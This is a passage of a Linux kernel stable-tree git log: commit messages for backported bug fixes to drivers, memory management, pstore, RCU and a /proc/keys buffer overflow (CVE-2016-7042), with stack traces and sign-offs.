hwmon: (adt7411) set bit 3 in CFG1 register
commit
b53893aae441a034bf4dbbad42fe218561d7d81f upstream.
According to the datasheet you should only write 1 to this bit. If it is
not set, at least AIN3 will return bad values on newer silicon revisions.
Fixes:
d84ca5b345c2 ("hwmon: Add driver for ADT7411 voltage and temperature sensor")
Signed-off-by: Michael Walle <michael@walle.cc>
Signed-off-by: Guenter Roeck <linux@roeck-us.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Sergei Miroshnichenko [Wed, 7 Sep 2016 13:51:12 +0000 (16:51 +0300)]
can: dev: fix deadlock reported after bus-off
commit
9abefcb1aaa58b9d5aa40a8bb12c87d02415e4c8 upstream.
A timer was used to restart after the bus-off state, leading to a
relatively large can_restart() executed in an interrupt context,
which in turn sets up pinctrl. When this happens during system boot,
there is a high probability of grabbing the pinctrl_list_mutex,
which is locked already by the probe() of other device, making the
kernel suspect a deadlock condition [1].
To resolve this issue, the restart_timer is replaced by a delayed
work.
[1] https://github.com/victronenergy/venus/issues/24
Signed-off-by: Sergei Miroshnichenko <sergeimir@emcraft.com>
Signed-off-by: Marc Kleine-Budde <mkl@pengutronix.de>
Signed-off-by: Willy Tarreau <w@1wt.eu>
zhong jiang [Wed, 28 Sep 2016 22:22:30 +0000 (15:22 -0700)]
mm,ksm: fix endless looping in allocating memory when ksm enable
commit
5b398e416e880159fe55eefd93c6588fa072cd66 upstream.
I hit the following hung task when runing a OOM LTP test case with 4.1
kernel.
Call trace:
[<
ffffffc000086a88>] __switch_to+0x74/0x8c
[<
ffffffc000a1bae0>] __schedule+0x23c/0x7bc
[<
ffffffc000a1c09c>] schedule+0x3c/0x94
[<
ffffffc000a1eb84>] rwsem_down_write_failed+0x214/0x350
[<
ffffffc000a1e32c>] down_write+0x64/0x80
[<
ffffffc00021f794>] __ksm_exit+0x90/0x19c
[<
ffffffc0000be650>] mmput+0x118/0x11c
[<
ffffffc0000c3ec4>] do_exit+0x2dc/0xa74
[<
ffffffc0000c46f8>] do_group_exit+0x4c/0xe4
[<
ffffffc0000d0f34>] get_signal+0x444/0x5e0
[<
ffffffc000089fcc>] do_signal+0x1d8/0x450
[<
ffffffc00008a35c>] do_notify_resume+0x70/0x78
The oom victim cannot terminate because it needs to take mmap_sem for
write while the lock is held by ksmd for read which loops in the page
allocator
ksm_do_scan
scan_get_next_rmap_item
down_read
get_next_rmap_item
alloc_rmap_item #ksmd will loop permanently.
There is no way forward because the oom victim cannot release any memory
in 4.1 based kernel. Since 4.6 we have the oom reaper which would solve
this problem because it would release the memory asynchronously.
Nevertheless we can relax alloc_rmap_item requirements and use
__GFP_NORETRY because the allocation failure is acceptable as ksm_do_scan
would just retry later after the lock got dropped.
Such a patch would be also easy to backport to older stable kernels which
do not have oom_reaper.
While we are at it add GFP_NOWARN so the admin doesn't have to be alarmed
by the allocation failure.
Link: http://lkml.kernel.org/r/1474165570-44398-1-git-send-email-zhongjiang@huawei.com
Signed-off-by: zhong jiang <zhongjiang@huawei.com>
Suggested-by: Hugh Dickins <hughd@google.com>
Suggested-by: Michal Hocko <mhocko@suse.cz>
Acked-by: Michal Hocko <mhocko@suse.com>
Acked-by: Hugh Dickins <hughd@google.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Mike Snitzer [Thu, 25 Aug 2016 01:12:58 +0000 (21:12 -0400)]
dm flakey: fix reads to be issued if drop_writes configured
commit
299f6230bc6d0ccd5f95bb0fb865d80a9c7d5ccc upstream.
v4.8-rc3 commit
99f3c90d0d ("dm flakey: error READ bios during the
down_interval") overlooked the 'drop_writes' feature, which is meant to
allow reads to be issued rather than errored, during the down_interval.
Fixes:
99f3c90d0d ("dm flakey: error READ bios during the down_interval")
Reported-by: Qu Wenruo <quwenruo@cn.fujitsu.com>
Signed-off-by: Mike Snitzer <snitzer@redhat.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Chris Metcalf [Wed, 16 Nov 2016 16:18:05 +0000 (11:18 -0500)]
tile: avoid using clocksource_cyc2ns with absolute cycle count
commit
e658a6f14d7c0243205f035979d0ecf6c12a036f upstream.
For large values of "mult" and long uptimes, the intermediate
result of "cycles * mult" can overflow 64 bits. For example,
the tile platform calls clocksource_cyc2ns with a 1.2 GHz clock;
we have mult = 853, and after 208.5 days, we overflow 64 bits.
Since clocksource_cyc2ns() is intended to be used for relative
cycle counts, not absolute cycle counts, performance is more
importance than accepting a wider range of cycle values. So,
just use mult_frac() directly in tile's sched_clock().
Commit
4cecf6d401a0 ("sched, x86: Avoid unnecessary overflow
in sched_clock") by Salman Qazi results in essentially the same
generated code for x86 as this change does for tile. In fact,
a follow-on change by Salman introduced mult_frac() and switched
to using it, so the C code was largely identical at that point too.
Peter Zijlstra then added mul_u64_u32_shr() and switched x86
to use it. This is, in principle, better; by optimizing the
64x64->64 multiplies to be 32x32->64 multiplies we can potentially
save some time. However, the compiler piplines the 64x64->64
multiplies pretty well, and the conditional branch in the generic
mul_u64_u32_shr() causes some bubbles in execution, with the
result that it's pretty much a wash. If tilegx provided its own
implementation of mul_u64_u32_shr() without the conditional branch,
we could potentially save 3 cycles, but that seems like small gain
for a fair amount of additional build scaffolding; no other platform
currently provides a mul_u64_u32_shr() override, and tile doesn't
currently have an <asm/div64.h> header to put the override in.
Additionally, gcc currently has an optimization bug that prevents
it from recognizing the opportunity to use a 32x32->64 multiply,
and so the result would be no better than the existing mult_frac()
until such time as the compiler is fixed.
For now, just using mult_frac() seems like the right answer.
Signed-off-by: Chris Metcalf <cmetcalf@mellanox.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Myron Stowe [Tue, 3 Feb 2015 23:01:24 +0000 (16:01 -0700)]
PCI: Handle read-only BARs on AMD CS553x devices
commit
06cf35f903aa6da0cc8d9f81e9bcd1f7e1b534bb upstream.
Some AMD CS553x devices have read-only BARs because of a firmware or
hardware defect. There's a workaround in quirk_cs5536_vsa(), but it no
longer works after
36e8164882ca ("PCI: Restore detection of read-only
BARs"). Prior to
36e8164882ca, we filled in res->start; afterwards we
leave it zeroed out. The quirk only updated the size, so the driver tried
to use a region starting at zero, which didn't work.
Expand quirk_cs5536_vsa() to read the base addresses from the BARs and
hard-code the sizes.
On Nix's system BAR 2's read-only value is 0x6200. Prior to
36e8164882ca,
we interpret that as a 512-byte BAR based on the lowest-order bit set. Per
datasheet sec 5.6.1, that BAR (MFGPT) requires only 64 bytes; use that to
avoid clearing any address bits if a platform uses only 64-byte alignment.
[js] pcibios_bus_to_resource takes pdev, not bus in 3.12
[bhelgaas: changelog, reduce BAR 2 size to 64]
Fixes:
36e8164882ca ("PCI: Restore detection of read-only BARs")
Link: https://bugzilla.kernel.org/show_bug.cgi?id=85991#c4
Link: http://support.amd.com/TechDocs/31506_cs5535_databook.pdf
Link: http://support.amd.com/TechDocs/33238G_cs5536_db.pdf
Reported-and-tested-by: Nix <nix@esperi.org.uk>
Signed-off-by: Myron Stowe <myron.stowe@redhat.com>
Signed-off-by: Bjorn Helgaas <bhelgaas@google.com>
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Punit Agrawal [Tue, 18 Oct 2016 16:07:19 +0000 (17:07 +0100)]
ACPI / APEI: Fix incorrect return value of ghes_proc()
commit
806487a8fc8f385af75ed261e9ab658fc845e633 upstream.
Although ghes_proc() tests for errors while reading the error status,
it always return success (0). Fix this by propagating the return
value.
Fixes:
d334a49113a4a33 (ACPI, APEI, Generic Hardware Error Source memory error support)
Signed-of-by: Punit Agrawal <punit.agrawa.@arm.com>
Tested-by: Tyler Baicar <tbaicar@codeaurora.org>
Reviewed-by: Borislav Petkov <bp@suse.de>
[ rjw: Subject ]
Signed-off-by: Rafael J. Wysocki <rafael.j.wysocki@intel.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Alexander Usyskin [Mon, 31 Oct 2016 17:02:39 +0000 (19:02 +0200)]
mei: bus: fix received data size check in NFC fixup
commit
582ab27a063a506ccb55fc48afcc325342a2deba upstream.
NFC version reply size checked against only header size, not against
full message size. That may lead potentially to uninitialized memory access
in version data.
That leads to warnings when version data is accessed:
drivers/misc/mei/bus-fixup.c: warning: '*((void *)&ver+11)' may be used uninitialized in this function [-Wuninitialized]: => 212:2
Reported in
Build regressions/improvements in v4.9-rc3
https://lkml.org/lkml/2016/10/30/57
[js] the check is in 3.12 only once
Fixes:
59fcd7c63abf (mei: nfc: Initial nfc implementation)
Signed-off-by: Alexander Usyskin <alexander.usyskin@intel.com>
Signed-off-by: Tomas Winkler <tomas.winkler@intel.com>
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Arnd Bergmann [Mon, 24 Oct 2016 15:22:01 +0000 (17:22 +0200)]
staging: iio: ad5933: avoid uninitialized variable in error case
commit
34eee70a7b82b09dbda4cb453e0e21d460dae226 upstream.
The ad5933_i2c_read function returns an error code to indicate
whether it could read data or not. However ad5933_work() ignores
this return code and just accesses the data unconditionally,
which gets detected by gcc as a possible bug:
drivers/staging/iio/impedance-analyzer/ad5933.c: In function 'ad5933_work':
drivers/staging/iio/impedance-analyzer/ad5933.c:649:16: warning: 'status' may be used uninitialized in this function [-Wmaybe-uninitialized]
This adds minimal error handling so we only evaluate the
data if it was correctly read.
Link: https://patchwork.kernel.org/patch/8110281/
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Acked-by: Lars-Peter Clausen <lars@metafoo.de>
Signed-off-by: Jonathan Cameron <jic23@kernel.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Long Li [Wed, 5 Oct 2016 23:57:46 +0000 (16:57 -0700)]
hv: do not lose pending heartbeat vmbus packets
commit
407a3aee6ee2d2cb46d9ba3fc380bc29f35d020c upstream.
The host keeps sending heartbeat packets independent of the
guest responding to them. Even though we respond to the heartbeat messages at
interrupt level, we can have situations where there maybe multiple heartbeat
messages pending that have not been responded to. For instance this occurs when the
VM is paused and the host continues to send the heartbeat messages.
Address this issue by draining and responding to all
the heartbeat messages that maybe pending.
Signed-off-by: Long Li <longli@microsoft.com>
Signed-off-by: K. Y. Srinivasan <kys@microsoft.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
David Howells [Wed, 26 Oct 2016 14:01:54 +0000 (15:01 +0100)]
KEYS: Fix short sprintf buffer in /proc/keys show function
commit
03dab869b7b239c4e013ec82aea22e181e441cfc upstream.
This fixes CVE-2016-7042.
Fix a short sprintf buffer in proc_keys_show(). If the gcc stack protector
is turned on, this can cause a panic due to stack corruption.
The problem is that xbuf[] is not big enough to hold a 64-bit timeout
rendered as weeks:
(gdb) p 0xffffffffffffffffULL/(60*60*24*7)
$2 =
30500568904943
That's 14 chars plus NUL, not 11 chars plus NUL.
Expand the buffer to 16 chars.
I think the unpatched code apparently works if the stack-protector is not
enabled because on a 32-bit machine the buffer won't be overflowed and on a
64-bit machine there's a 64-bit aligned pointer at one side and an int that
isn't checked again on the other side.
The panic incurred looks something like:
Kernel panic - not syncing: stack-protector: Kernel stack is corrupted in:
ffffffff81352ebe
CPU: 0 PID: 1692 Comm: reproducer Not tainted 4.7.2-201.fc24.x86_64 #1
Hardware name: Red Hat KVM, BIOS 0.5.1 01/01/2011
0000000000000086 00000000fbbd2679 ffff8800a044bc00 ffffffff813d941f
ffffffff81a28d58 ffff8800a044bc98 ffff8800a044bc88 ffffffff811b2cb6
ffff880000000010 ffff8800a044bc98 ffff8800a044bc30 00000000fbbd2679
Call Trace:
[<
ffffffff813d941f>] dump_stack+0x63/0x84
[<
ffffffff811b2cb6>] panic+0xde/0x22a
[<
ffffffff81352ebe>] ? proc_keys_show+0x3ce/0x3d0
[<
ffffffff8109f7f9>] __stack_chk_fail+0x19/0x30
[<
ffffffff81352ebe>] proc_keys_show+0x3ce/0x3d0
[<
ffffffff81350410>] ? key_validate+0x50/0x50
[<
ffffffff8134db30>] ? key_default_cmp+0x20/0x20
[<
ffffffff8126b31c>] seq_read+0x2cc/0x390
[<
ffffffff812b6b12>] proc_reg_read+0x42/0x70
[<
ffffffff81244fc7>] __vfs_read+0x37/0x150
[<
ffffffff81357020>] ? security_file_permission+0xa0/0xc0
[<
ffffffff81246156>] vfs_read+0x96/0x130
[<
ffffffff81247635>] SyS_read+0x55/0xc0
[<
ffffffff817eb872>] entry_SYSCALL_64_fastpath+0x1a/0xa4
Reported-by: Ondrej Kozina <okozina@redhat.com>
Signed-off-by: David Howells <dhowells@redhat.com>
Tested-by: Ondrej Kozina <okozina@redhat.com>
Signed-off-by: James Morris <james.l.morris@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Jan Viktorin [Tue, 17 May 2016 09:22:17 +0000 (11:22 +0200)]
uio: fix dmem_region_start computation
commit
4d31a2588ae37a5d0f61f4d956454e9504846aeb upstream.
The variable i contains a total number of resources (including
IORESOURCE_IRQ). However, we want the dmem_region_start to point
after the last resource of type IORESOURCE_MEM. The original behaviour
leads (very likely) to skipping several UIO mapping regions and makes
them useless. Fix this by computing dmem_region_start from the uiomem
which points to the last used UIO mapping.
Fixes:
0a0c3b5a24bd ("Add new uio device for dynamic memory allocation")
Signed-off-by: Jan Viktorin <viktorin@rehivetech.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Liu Gang [Fri, 21 Oct 2016 07:31:28 +0000 (15:31 +0800)]
gpio: mpc8xxx: Correct irq handler function
commit
d71cf15b865bdd45925f7b094d169aaabd705145 upstream.
From the beginning of the gpio-mpc8xxx.c, the "handle_level_irq"
has being used to handle GPIO interrupts in the PowerPC/Layerscape
platforms. But actually, almost all PowerPC/Layerscape platforms
assert an interrupt request upon either a high-to-low change or
any change on the state of the signal.
So the "handle_level_irq" is not reasonable for PowerPC/Layerscape
GPIO interrupt, it should be "handle_edge_irq". Otherwise the system
may lost some interrupts from the PIN's state changes.
Signed-off-by: Liu Gang <Gang.Liu@nxp.com>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Mauro Carvalho Chehab [Sun, 4 Sep 2016 13:06:39 +0000 (10:06 -0300)]
cx231xx: fix GPIOs for Pixelview SBTVD hybrid
commit
24b923f073ac37eb744f56a2c7f77107b8219ab2 upstream.
This device uses GPIOs: 28 to switch between analog and
digital modes: on digital mode, it should be set to 1.
The code that sets it on analog mode is OK, but it misses
the logic that sets it on digital mode.
Signed-off-by: Mauro Carvalho Chehab <mchehab@s-opensource.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Mauro Carvalho Chehab [Sun, 4 Sep 2016 12:56:33 +0000 (09:56 -0300)]
cx231xx: don't return error on success
commit
1871d718a9db649b70f0929d2778dc01bc49b286 upstream.
The cx231xx_set_agc_analog_digital_mux_select() callers
expect it to return 0 or an error. Returning a positive value
makes the first attempt to switch between analog/digital to fail.
Signed-off-by: Mauro Carvalho Chehab <mchehab@s-opensource.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Mauro Carvalho Chehab [Sun, 4 Sep 2016 13:43:53 +0000 (10:43 -0300)]
mb86a20s: fix demod settings
commit
505a0ea706fc1db4381baa6c6bd2e596e730a55e upstream.
With the current settings, only one channel locks properly.
That's likely because, when this driver was written, Brazil
were still using experimental transmissions.
Change it to reproduce the settings used by the newer drivers.
That makes it lock on other channels.
Tested with both PixelView SBTVD Hybrid (cx231xx-based) and
C3Tech Digital Duo HDTV/SDTV (em28xx-based) devices.
Signed-off-by: Mauro Carvalho Chehab <mchehab@s-opensource.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Mauro Carvalho Chehab [Sun, 4 Sep 2016 13:16:18 +0000 (10:16 -0300)]
mb86a20s: fix the locking logic
commit
dafb65fb98d85d8e78405e82c83e81975e5d5480 upstream.
On this frontend, it takes a while to start output normal
TS data. That only happens on state S9. On S8, the TS output
is enabled, but it is not reliable enough.
However, the zigzag loop is too fast to let it sync.
As, on practical tests, the zigzag software loop doesn't
seem to be helping, but just slowing down the tuning, let's
switch to hardware algorithm, as the tuners used on such
devices are capable of work with frequency drifts without
any help from software.
Signed-off-by: Mauro Carvalho Chehab <mchehab@s-opensource.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Andrew Bresticker [Mon, 15 Feb 2016 08:19:49 +0000 (09:19 +0100)]
pstore/ram: Use memcpy_fromio() to save old buffer
commit
d771fdf94180de2bd811ac90cba75f0f346abf8d upstream.
The ramoops buffer may be mapped as either I/O memory or uncached
memory. On ARM64, this results in a device-type (strongly-ordered)
mapping. Since unnaligned accesses to device-type memory will
generate an alignment fault (regardless of whether or not strict
alignment checking is enabled), it is not safe to use memcpy().
memcpy_fromio() is guaranteed to only use aligned accesses, so use
that instead.
Signed-off-by: Andrew Bresticker <abrestic@chromium.org>
Signed-off-by: Enric Balletbo Serra <enric.balletbo@collabora.com>
Reviewed-by: Puneet Kumar <puneetster@chromium.org>
Signed-off-by: Kees Cook <keescook@chromium.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Furquan Shaikh [Mon, 15 Feb 2016 08:19:48 +0000 (09:19 +0100)]
pstore/ram: Use memcpy_toio instead of memcpy
commit
7e75678d23167c2527e655658a8ef36a36c8b4d9 upstream.
persistent_ram_update uses vmap / iomap based on whether the buffer is in
memory region or reserved region. However, both map it as non-cacheable
memory. For armv8 specifically, non-cacheable mapping requests use a
memory type that has to be accessed aligned to the request size. memcpy()
doesn't guarantee that.
Signed-off-by: Furquan Shaikh <furquan@google.com>
Signed-off-by: Enric Balletbo Serra <enric.balletbo@collabora.com>
Reviewed-by: Aaron Durbin <adurbin@chromium.org>
Reviewed-by: Olof Johansson <olofj@chromium.org>
Tested-by: Furquan Shaikh <furquan@chromium.org>
Signed-off-by: Kees Cook <keescook@chromium.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Sebastian Andrzej Siewior [Thu, 8 Sep 2016 11:48:06 +0000 (13:48 +0200)]
pstore/core: drop cmpxchg based updates
commit
d5a9bf0b38d2ac85c9a693c7fb851f74fd2a2494 upstream.
I have here a FPGA behind PCIe which exports SRAM which I use for
pstore. Now it seems that the FPGA no longer supports cmpxchg based
updates and writes back 0xffâ
\80¦ff and returns the same. This leads to
crash during crash rendering pstore useless.
Since I doubt that there is much benefit from using cmpxchg() here, I am
dropping this atomic access and use the spinlock based version.
Cc: Anton Vorontsov <anton@enomsg.org>
Cc: Colin Cross <ccross@android.com>
Cc: Kees Cook <keescook@chromium.org>
Cc: Tony Luck <tony.luck@intel.com>
Cc: Rabin Vincent <rabinv@axis.com>
Tested-by: Rabin Vincent <rabinv@axis.com>
Signed-off-by: Sebastian Andrzej Siewior <bigeasy@linutronix.de>
Reviewed-by: Guenter Roeck <linux@roeck-us.net>
[kees: remove "_locked" suffix since it's the only option now]
Signed-off-by: Kees Cook <keescook@chromium.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Daniel Glöckner [Tue, 30 Aug 2016 12:17:30 +0000 (14:17 +0200)]
mmc: block: don't use CMD23 with very old MMC cards
commit
0ed50abb2d8fc81570b53af25621dad560cd49b3 upstream.
CMD23 aka SET_BLOCK_COUNT was introduced with MMC v3.1.
Older versions of the specification allowed to terminate
multi-block transfers only with CMD12.
The patch fixes the following problem:
mmc0: new MMC card at address 0001
mmcblk0: mmc0:0001 SDMB-16 15.3 MiB
mmcblk0: timed out sending SET_BLOCK_COUNT command, card status 0x400900
...
blk_update_request: I/O error, dev mmcblk0, sector 0
Buffer I/O error on dev mmcblk0, logical block 0, async page read
mmcblk0: unable to read partition table
Signed-off-by: Daniel Glöckner <dg@emlix.com>
Signed-off-by: Ulf Hansson <ulf.hansson@linaro.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Fabio Estevam [Sat, 5 Nov 2016 19:45:07 +0000 (17:45 -0200)]
mmc: mxs: Initialize the spinlock prior to using it
commit
f91346e8b5f46aaf12f1df26e87140584ffd1b3f upstream.
An interrupt may occur right after devm_request_irq() is called and
prior to the spinlock initialization, leading to a kernel oops,
as the interrupt handler uses the spinlock.
In order to prevent this problem, move the spinlock initialization
prior to requesting the interrupts.
Fixes:
e4243f13d10e (mmc: mxs-mmc: add mmc host driver for i.MX23/28)
Signed-off-by: Fabio Estevam <fabio.estevam@nxp.com>
Reviewed-by: Marek Vasut <marex@denx.de>
Signed-off-by: Ulf Hansson <ulf.hansson@linaro.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Johan Hovold [Tue, 1 Nov 2016 10:49:56 +0000 (11:49 +0100)]
PM / sleep: fix device reference leak in test_suspend
commit
ceb75787bc75d0a7b88519ab8a68067ac690f55a upstream.
Make sure to drop the reference taken by class_find_device() after
opening the RTC device.
Fixes:
77437fd4e61f (pm: boot time suspend selftest)
Signed-off-by: Johan Hovold <johan@kernel.org>
Signed-off-by: Rafael J. Wysocki <rafael.j.wysocki@intel.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Johan Hovold [Tue, 1 Nov 2016 10:38:18 +0000 (11:38 +0100)]
mfd: core: Fix device reference leak in mfd_clone_cell
commit
722f191080de641f023feaa7d5648caf377844f5 upstream.
Make sure to drop the reference taken by bus_find_device_by_name()
before returning from mfd_clone_cell().
Fixes:
a9bbba996302 ("mfd: add platform_device sharing support for mfd")
Signed-off-by: Johan Hovold <johan@kernel.org>
Signed-off-by: Lee Jones <lee.jones@linaro.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Jaewon Kim [Fri, 22 Jan 2016 00:55:07 +0000 (16:55 -0800)]
ratelimit: fix bug in time interval by resetting right begin time
commit
c2594bc37f4464bc74f2c119eb3269a643400aa0 upstream.
rs->begin in ratelimit is set in two cases.
1) when rs->begin was not initialized
2) when rs->interval was passed
For case #2, current ratelimit sets the begin to 0. This incurrs
improper suppression. The begin value will be set in the next ratelimit
call by 1). Then the time interval check will be always false, and
rs->printed will not be initialized. Although enough time passed,
ratelimit may return 0 if rs->printed is not less than rs->burst. To
reset interval properly, begin should be jiffies rather than 0.
For an example code below:
static DEFINE_RATELIMIT_STATE(mylimit, 1, 1);
for (i = 1; i <= 10; i++) {
if (__ratelimit(&mylimit))
printk("ratelimit test count %d\n", i);
msleep(3000);
}
test result in the current code shows suppression even there is 3 seconds sleep.
[ 78.391148] ratelimit test count 1
[ 81.295988] ratelimit test count 2
[ 87.315981] ratelimit test count 4
[ 93.336267] ratelimit test count 6
[ 99.356031] ratelimit test count 8
[ 105.376367] ratelimit test count 10
Signed-off-by: Jaewon Kim <jaewon31.kim@samsung.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Ding Tianhong [Wed, 15 Jun 2016 07:27:36 +0000 (15:27 +0800)]
rcu: Fix soft lockup for rcu_nocb_kthread
commit
bedc1969150d480c462cdac320fa944b694a7162 upstream.
Carrying out the following steps results in a softlockup in the
RCU callback-offload (rcuo) kthreads:
1. Connect to ixgbevf, and set the speed to 10Gb/s.
2. Use ifconfig to bring the nic up and down repeatedly.
[ 317.005148] IPv6: ADDRCONF(NETDEV_CHANGE): eth2: link becomes ready
[ 368.106005] BUG: soft lockup - CPU#1 stuck for 22s! [rcuos/1:15]
[ 368.106005] Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011
[ 368.106005] task:
ffff88057dd8a220 ti:
ffff88057dd9c000 task.ti:
ffff88057dd9c000
[ 368.106005] RIP: 0010:[<
ffffffff81579e04>] [<
ffffffff81579e04>] fib_table_lookup+0x14/0x390
[ 368.106005] RSP: 0018:
ffff88061fc83ce8 EFLAGS:
00000286
[ 368.106005] RAX:
0000000000000001 RBX:
00000000020155c0 RCX:
0000000000000001
[ 368.106005] RDX:
ffff88061fc83d50 RSI:
ffff88061fc83d70 RDI:
ffff880036d11a00
[ 368.106005] RBP:
ffff88061fc83d08 R08:
0000000000000001 R09:
0000000000000000
[ 368.106005] R10:
ffff880036d11a00 R11:
ffffffff819e0900 R12:
ffff88061fc83c58
[ 368.106005] R13:
ffffffff816154dd R14:
ffff88061fc83d08 R15:
00000000020155c0
[ 368.106005] FS:
0000000000000000(0000) GS:
ffff88061fc80000(0000) knlGS:
0000000000000000
[ 368.106005] CS: 0010 DS: 0000 ES: 0000 CR0:
0000000080050033
[ 368.106005] CR2:
00007f8c2aee9c40 CR3:
000000057b222000 CR4:
00000000000407e0
[ 368.106005] DR0:
0000000000000000 DR1:
0000000000000000 DR2:
0000000000000000
[ 368.106005] DR3:
0000000000000000 DR6:
00000000ffff0ff0 DR7:
0000000000000400
[ 368.106005] Stack:
[ 368.106005]
00000000010000c0 ffff88057b766000 ffff8802e380b000 ffff88057af03e00
[ 368.106005]
ffff88061fc83dc0 ffffffff815349a6 ffff88061fc83d40 ffffffff814ee146
[ 368.106005]
ffff8802e380af00 00000000e380af00 ffffffff819e0900 020155c0010000c0
[ 368.106005] Call Trace:
[ 368.106005] <IRQ>
[ 368.106005]
[ 368.106005] [<
ffffffff815349a6>] ip_route_input_noref+0x516/0xbd0
[ 368.106005] [<
ffffffff814ee146>] ? skb_release_data+0xd6/0x110
[ 368.106005] [<
ffffffff814ee20a>] ? kfree_skb+0x3a/0xa0
[ 368.106005] [<
ffffffff8153698f>] ip_rcv_finish+0x29f/0x350
[ 368.106005] [<
ffffffff81537034>] ip_rcv+0x234/0x380
[ 368.106005] [<
ffffffff814fd656>] __netif_receive_skb_core+0x676/0x870
[ 368.106005] [<
ffffffff814fd868>] __netif_receive_skb+0x18/0x60
[ 368.106005] [<
ffffffff814fe4de>] process_backlog+0xae/0x180
[ 368.106005] [<
ffffffff814fdcb2>] net_rx_action+0x152/0x240
[ 368.106005] [<
ffffffff81077b3f>] __do_softirq+0xef/0x280
[ 368.106005] [<
ffffffff8161619c>] call_softirq+0x1c/0x30
[ 368.106005] <EOI>
[ 368.106005]
[ 368.106005] [<
ffffffff81015d95>] do_softirq+0x65/0xa0
[ 368.106005] [<
ffffffff81077174>] local_bh_enable+0x94/0xa0
[ 368.106005] [<
ffffffff81114922>] rcu_nocb_kthread+0x232/0x370
[ 368.106005] [<
ffffffff81098250>] ? wake_up_bit+0x30/0x30
[ 368.106005] [<
ffffffff811146f0>] ? rcu_start_gp+0x40/0x40
[ 368.106005] [<
ffffffff8109728f>] kthread+0xcf/0xe0
[ 368.106005] [<
ffffffff810971c0>] ? kthread_create_on_node+0x140/0x140
[ 368.106005] [<
ffffffff816147d8>] ret_from_fork+0x58/0x90
[ 368.106005] [<
ffffffff810971c0>] ? kthread_create_on_node+0x140/0x140
==================================cut here==============================
It turns out that the rcuos callback-offload kthread is busy processing
a very large quantity of RCU callbacks, and it is not reliquishing the
CPU while doing so. This commit therefore adds an cond_resched_rcu_qs()
within the loop to allow other tasks to run.
[js] use onlu cond_resched() in 3.12
Signed-off-by: Ding Tianhong <dingtianhong@huawei.com>
[ paulmck: Substituted cond_resched_rcu_qs for cond_resched. ]
Signed-off-by: Paul E. McKenney <paulmck@linux.vnet.ibm.com>
Cc: Dhaval Giani <dhaval.giani@oracle.com>
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Dan Carpenter [Wed, 20 Jul 2016 22:45:05 +0000 (15:45 -0700)]
tools/vm/slabinfo: fix an unintentional printf
commit
2d6a4d64812bb12dda53704943b61a7496d02098 upstream.
The curly braces are missing here so we print stuff unintentionally.
Fixes:
9da4714a2d44 ('slub: slabinfo update for cmpxchg handling')
Link: http://lkml.kernel.org/r/20160715211243.GE19522@mwanda
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Acked-by: Christoph Lameter <cl@linux.com>
Cc: Sergey Senozhatsky <sergey.senozhatsky@gmail.com>
Cc: Colin Ian King <colin.king@canonical.com>
Cc: Laura Abbott <labbott@fedoraproject.org>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Daniel Mentz [Fri, 28 Oct 2016 00:46:59 +0000 (17:46 -0700)]
lib/genalloc.c: start search from start of chunk
commit
62e931fac45b17c2a42549389879411572f75804 upstream.
gen_pool_alloc_algo() iterates over the chunks of a pool trying to find
a contiguous block of memory that satisfies the allocation request.
The shortcut
if (size > atomic_read(&chunk->avail))
continue;
makes the loop skip over chunks that do not have enough bytes left to
fulfill the request. There are two situations, though, where an
allocation might still fail:
(1) The available memory is not contiguous, i.e. the request cannot
be fulfilled due to external fragmentation.
(2) A race condition. Another thread runs the same code concurrently
and is quicker to grab the available memory.
In those situations, the loop calls pool->algo() to search the entire
chunk, and pool->algo() returns some value that is >= end_bit to
indicate that the search failed. This return value is then assigned to
start_bit. The variables start_bit and end_bit describe the range that
should be searched, and this range should be reset for every chunk that
is searched. Today, the code fails to reset start_bit to 0. As a
result, prefixes of subsequent chunks are ignored. Memory allocations
might fail even though there is plenty of room left in these prefixes of
those other chunks.
Fixes:
7f184275aa30 ("lib, Make gen_pool memory allocator lockless")
Link: http://lkml.kernel.org/r/1477420604-28918-1-git-send-email-danielmentz@google.com
Signed-off-by: Daniel Mentz <danielmentz@google.com>
Reviewed-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
Acked-by: Will Deacon <will.deacon@arm.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Richard Weinberger [Wed, 9 Nov 2016 21:52:58 +0000 (22:52 +0100)]
drbd: Fix kernel_sendmsg() usage - potential NULL deref
